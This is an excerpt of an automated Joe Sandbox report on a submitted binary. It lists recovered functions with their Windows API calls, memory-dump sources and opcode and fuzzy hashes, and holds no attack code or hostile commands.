                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3368777196-0
                                              • Opcode ID: aed8af1d3425c1aa35f3a7c37f905d7cd2255409cc522fd0ac671b38d79acb37
                                              • Instruction ID: 38a3603841402cd3e1932856f62947703bad040e5ce7a5c3896e461f77ce0778
                                              • Opcode Fuzzy Hash: aed8af1d3425c1aa35f3a7c37f905d7cd2255409cc522fd0ac671b38d79acb37
                                              • Instruction Fuzzy Hash: 8D415771900205EFDF15AF55DC85AAA7BB8FF44300F1480A5F900AA297DB71DEA4DBB0
                                              Function 00E081DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00DCF3AB,00000000,?,?,00000000,?,00DC682C,00000004,00000000,00000000), ref: 00E0824C
                                              • EnableWindow.USER32(00000000,00000000), ref: 00E08272
                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00E082D1
                                              • ShowWindow.USER32(00000000,00000004), ref: 00E082E5
                                              • EnableWindow.USER32(00000000,00000001), ref: 00E0830B
                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00E0832F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID:
                                              • API String ID: 642888154-0
                                              • Opcode ID: 62e11c6af4d575613fba72ae4146726b561f8e250ac60e2a3a73b0a25dffb904
                                              • Instruction ID: a7e9377f2cd587d0197950609abd8f5557b514376beab5a8328bd9a599b92c8e
                                              • Opcode Fuzzy Hash: 62e11c6af4d575613fba72ae4146726b561f8e250ac60e2a3a73b0a25dffb904
                                              • Instruction Fuzzy Hash: B741DA34601644DFDF11CF15C999BE47BE0FB4A718F1822A5E6886B1F2C73258C5CB41
                                              Function 00DD4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00DD4C95
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DD4CB2
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DD4CEA
                                              • _wcslen.LIBCMT ref: 00DD4D08
                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DD4D10
                                              • _wcsstr.LIBVCRUNTIME ref: 00DD4D1A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                              • String ID:
                                              • API String ID: 72514467-0
                                              • Opcode ID: ac0d27aaf0d7602e9769feac8b2a7de65b8ebc39bfb462b6261908c3779cf50a
                                              • Instruction ID: cc617a11b6e4550193d05ae6c9283f4bc5b66b903f7fa728ddd1d17cdf42c1e2
                                              • Opcode Fuzzy Hash: ac0d27aaf0d7602e9769feac8b2a7de65b8ebc39bfb462b6261908c3779cf50a
                                              • Instruction Fuzzy Hash: B621F931204204BFEB255B39EC49E7B7B9DDF45B50F14412AF805DA291DE72DC4197B1
                                              Function 00DE581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D73AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D73A97,?,?,00D72E7F,?,?,?,00000000), ref: 00D73AC2
                                              • _wcslen.LIBCMT ref: 00DE587B
                                              • CoInitialize.OLE32(00000000), ref: 00DE5995
                                              • CoCreateInstance.COMBASE(00E0FCF8,00000000,00000001,00E0FB68,?), ref: 00DE59AE
                                              • CoUninitialize.COMBASE ref: 00DE59CC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                              • String ID: .lnk
                                              • API String ID: 3172280962-24824748
                                              • Opcode ID: 22b05d08bf43d867f56f5ca1f90f4fc707575a25d757499aebb3ea4ef0c691b1
                                              • Instruction ID: 38a7f70673d3b20e284d996773314212638b5549e2aa8a2fc0c05c7384e07d75
                                              • Opcode Fuzzy Hash: 22b05d08bf43d867f56f5ca1f90f4fc707575a25d757499aebb3ea4ef0c691b1
                                              • Instruction Fuzzy Hash: 6ED175716047019FC714EF26D880A2ABBE1EF89758F14895DF8899B362D731EC45CFA2
                                              Function 00DD175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DD0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DD0FCA
                                                • Part of subcall function 00DD0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DD0FD6
                                                • Part of subcall function 00DD0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DD0FE5
                                                • Part of subcall function 00DD0FB4: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00DD0FEC
                                                • Part of subcall function 00DD0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DD1002
                                              • GetLengthSid.ADVAPI32(?,00000000,00DD1335), ref: 00DD17AE
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00DD17BA
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DD17C1
                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00DD17DA
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00DD1335), ref: 00DD17EE
                                              • HeapFree.KERNEL32(00000000), ref: 00DD17F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                              • String ID:
                                              • API String ID: 169236558-0
                                              • Opcode ID: 6b0c618052ab499b9204f7320286ee14f821732e5b385097b0f90c8a6eef7029
                                              • Instruction ID: baf8d7e0b0bbbc38d2309f2b037133dde22edb1eb5d122591e403db4d5f86228
                                              • Opcode Fuzzy Hash: 6b0c618052ab499b9204f7320286ee14f821732e5b385097b0f90c8a6eef7029
                                              • Instruction Fuzzy Hash: 90117C75601205FFDB109FA5CC49BAE7BB9FB45355F24421AF481A7220D736A988CB70
                                              Function 00D93382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00D93379,00D92FE5), ref: 00D93390
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9339E
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D933B7
                                              • SetLastError.KERNEL32(00000000,?,00D93379,00D92FE5), ref: 00D93409
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 726350618c2c5f11650954c331d7a2549e306487fcc37f65d51853f20e2a63e6
                                              • Instruction ID: 43ae81f2371c4542fc3c72ad8125d5c1bd25deb6f28c2edbd793fedeb26426f1
                                              • Opcode Fuzzy Hash: 726350618c2c5f11650954c331d7a2549e306487fcc37f65d51853f20e2a63e6
                                              • Instruction Fuzzy Hash: 5901243224D311BFEF2827BABC899272E94EB05779B300329F410A11F0EF128D0A5A74
                                              Function 00DA2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00DA5686,00DB3CD6,?,00000000,?,00DA5B6A,?,?,?,?,?,00D9E6D1,?,00E38A48), ref: 00DA2D78
                                              • _free.LIBCMT ref: 00DA2DAB
                                              • _free.LIBCMT ref: 00DA2DD3
                                              • SetLastError.KERNEL32(00000000,?,?,?,?,00D9E6D1,?,00E38A48,00000010,00D74F4A,?,?,00000000,00DB3CD6), ref: 00DA2DE0
                                              • SetLastError.KERNEL32(00000000,?,?,?,?,00D9E6D1,?,00E38A48,00000010,00D74F4A,?,?,00000000,00DB3CD6), ref: 00DA2DEC
                                              • _abort.LIBCMT ref: 00DA2DF2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: 3df4f85c04d7d4e65a4bdc1514c2bf267b75b4f69f417b469adef6695baaef56
                                              • Instruction ID: 2ef9aa1db82140edff1007adfe5a1eee8c52e4a448445fe4fe0d366460a2a726
                                              • Opcode Fuzzy Hash: 3df4f85c04d7d4e65a4bdc1514c2bf267b75b4f69f417b469adef6695baaef56
                                              • Instruction Fuzzy Hash: F3F049355456006BCA62273F7C0AB7B1656EFC3771B354514F424A2197EF29CC4551B1
                                              Function 00E08A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D89693
                                                • Part of subcall function 00D89639: SelectObject.GDI32(?,00000000), ref: 00D896A2
                                                • Part of subcall function 00D89639: BeginPath.GDI32(?), ref: 00D896B9
                                                • Part of subcall function 00D89639: SelectObject.GDI32(?,00000000), ref: 00D896E2
                                              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00E08A4E
                                              • LineTo.GDI32(?,00000003,00000000), ref: 00E08A62
                                              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00E08A70
                                              • LineTo.GDI32(?,00000000,00000003), ref: 00E08A80
                                              • EndPath.GDI32(?), ref: 00E08A90
                                              • StrokePath.GDI32(?), ref: 00E08AA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                              • String ID:
                                              • API String ID: 43455801-0
                                              • Opcode ID: 1abf4a3ae93d861ae98f5b50ac410724104fd565dcc933082f584a7eaa1c6228
                                              • Instruction ID: 9c4d8eec43065f7a8ce98f2d6a2648a83b4af5bc9ade09cfd93ec4f2578f3364
                                              • Opcode Fuzzy Hash: 1abf4a3ae93d861ae98f5b50ac410724104fd565dcc933082f584a7eaa1c6228
                                              • Instruction Fuzzy Hash: D9111E7600010CFFEF119F91DC88EAA7F6CEB04354F148151FA55A51A1C7729D99DFA0
                                              Function 00DD51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00DD5218
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DD5229
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DD5230
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00DD5238
                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00DD524F
                                              • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00DD5261
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: 1a87ba0ff53b8da450aad48413652aca3019e492f06953e2edd3c76a9267a471
                                              • Instruction ID: 3517deeef6230c18a46590281504070c4c9bba0e9b6cc51d3890489ea5a1d6fd
                                              • Opcode Fuzzy Hash: 1a87ba0ff53b8da450aad48413652aca3019e492f06953e2edd3c76a9267a471
                                              • Instruction Fuzzy Hash: D2018F75A00708BFEB109BA69C49F4EBFB8EF48751F144166FA04A7280D6719808CBA0
                                              Function 00D71BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D71BF4
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D71BFC
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D71C07
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D71C12
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D71C1A
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D71C22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
                                              • Opcode ID: fb948e3bd4dc8f7882a06467569511019070196d3e4cbbad260537aa08c0e2b8
                                              • Instruction ID: 186161fa0bf59cbeb20d03ec47713659ff6616aa66dd90ab51f131fefe9f299a
                                              • Opcode Fuzzy Hash: fb948e3bd4dc8f7882a06467569511019070196d3e4cbbad260537aa08c0e2b8
                                              • Instruction Fuzzy Hash: 59016CB09027597DE3008F5A8C85B52FFA8FF19754F00411B915C47941C7F5A864CBE5
                                              Function 00DDEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DDEB30
                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DDEB46
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00DDEB55
                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEB64
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEB6E
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEB75
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                              • String ID:
                                              • API String ID: 839392675-0
                                              • Opcode ID: 7eb2769985f4043e936c5117babcea73793d9920d0bd15b98025feb82d47b03c
                                              • Instruction ID: 3cee9620a07ceb2fef3751669f8490ef253221d04e69b85e71d5dc9f3b712c88
                                              • Opcode Fuzzy Hash: 7eb2769985f4043e936c5117babcea73793d9920d0bd15b98025feb82d47b03c
                                              • Instruction Fuzzy Hash: EBF09072101118BFE7205753AC0DEEF3A7CEFCAF11F100259F601E1090D7A21A45C6B5
                                              Function 00DC7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetClientRect.USER32(?), ref: 00DC7452
                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00DC7469
                                              • GetWindowDC.USER32(?), ref: 00DC7475
                                              • GetPixel.GDI32(00000000,?,?), ref: 00DC7484
                                              • ReleaseDC.USER32(?,00000000), ref: 00DC7496
                                              • GetSysColor.USER32(00000005), ref: 00DC74B0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                              • String ID:
                                              • API String ID: 272304278-0
                                              • Opcode ID: 753c22d569e09460e6b6ed313af7b1ec4d95c3f9289827ab6d534356acd23f22
                                              • Instruction ID: 1071e7ffdf4ca93f42cc9d72e1567813b5b7215f60f3cb813f6fe3bfb58d6f46
                                              • Opcode Fuzzy Hash: 753c22d569e09460e6b6ed313af7b1ec4d95c3f9289827ab6d534356acd23f22
                                              • Instruction Fuzzy Hash: 23018B31404206EFDB205F65EC08FAA7BB5FB04321F250264FA15A30A0CB321E86AF61
                                              Function 00D7BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                              Download Yara Rule
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00D7BEB3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: D%$D%$D%$D%
                                              • API String ID: 1385522511-2722557190
                                              • Opcode ID: 9141dd1d4296ee5e326fdfae4ad77718c52941767188e14ca1efd14b98042395
                                              • Instruction ID: a14c82fc0ba12f8e9d3ac12dd16b38748534f72415085457df4ef0dfb3bc716a
                                              • Opcode Fuzzy Hash: 9141dd1d4296ee5e326fdfae4ad77718c52941767188e14ca1efd14b98042395
                                              • Instruction Fuzzy Hash: F8912D75A00206DFCB14CF69C0916A9B7F1FF59324F64C15EE989AB351E731E981CBA0
                                              Function 00DDC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D77620: _wcslen.LIBCMT ref: 00D77625
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DDC6EE
                                              • _wcslen.LIBCMT ref: 00DDC735
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DDC79C
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DDC7CA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
